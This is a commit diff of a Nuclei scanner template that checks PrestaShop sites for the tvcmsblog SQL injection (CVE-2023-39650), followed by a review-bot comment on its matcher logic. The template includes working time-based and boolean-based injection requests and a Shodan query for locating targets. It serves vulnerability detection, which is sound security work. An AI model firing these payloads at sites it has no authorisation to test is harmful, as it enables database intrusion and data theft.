updated req. & matcher

patch-12
Ritik Chaddha 2024-09-16 17:26:11 +04:00 committed by GitHub
parent 443c618c81
commit 8ed3453a2b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 31 deletions

@ -1,62 +1,42 @@
id: CVE-2023-39650 id: CVE-2023-39650
info: info:
name: PrestaShop Theme Volty CMS Blog SQL Injection name: PrestaShop Theme Volty CMS Blog - SQL Injection
author: mastercho author: mastercho
severity: critical severity: critical
description: | description: |
In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact: | impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39650
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2023-27847 cve-id: CVE-2023-39650
cwe-id: CWE-89 cwe-id: CWE-89
epss-score: 0.04685 epss-score: 0.04685
epss-percentile: 0.91818 epss-percentile: 0.91818
metadata: metadata:
redirects: true max-request: 1
max-redirects: 3 verified: true
framework: prestashop framework: prestashop
shodan-query: http.component:"Prestashop" shodan-query: html:"/tvcmsblog"
tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog tags: cve,cve2023,prestashop,sqli,tvcmsblog
http: http:
- raw: - raw:
- | - |
@timeout: 20s @timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
host-redirects: true host-redirects: true
matchers: matchers:
- type: dsl - type: dsl
name: time-based name: time-based
dsl: dsl:
- 'duration_1>=5' - 'duration>=6'
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' - 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
condition: and condition: and
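Review bot: the `time-based` matcher on the new side rests on a single timing sample (`duration>=6` against `SLEEP(6)`), and with the two boolean requests and the `blind-based` matcher removed there is no second signal left. A host that is merely slow and returns 200 with "tvcmsblog" and "prestashop" somewhere in the response would be reported as vulnerable. Consider comparing the delay against a baseline response time for the same endpoint instead of a fixed threshold, or keeping a second confirming condition. Two smaller points: the `impact` text still reads "accessand" on the new side and could be fixed in the same pass, and the `unauth` tag is dropped although the description still says a guest can perform the injection, so it is worth confirming that removal is intended.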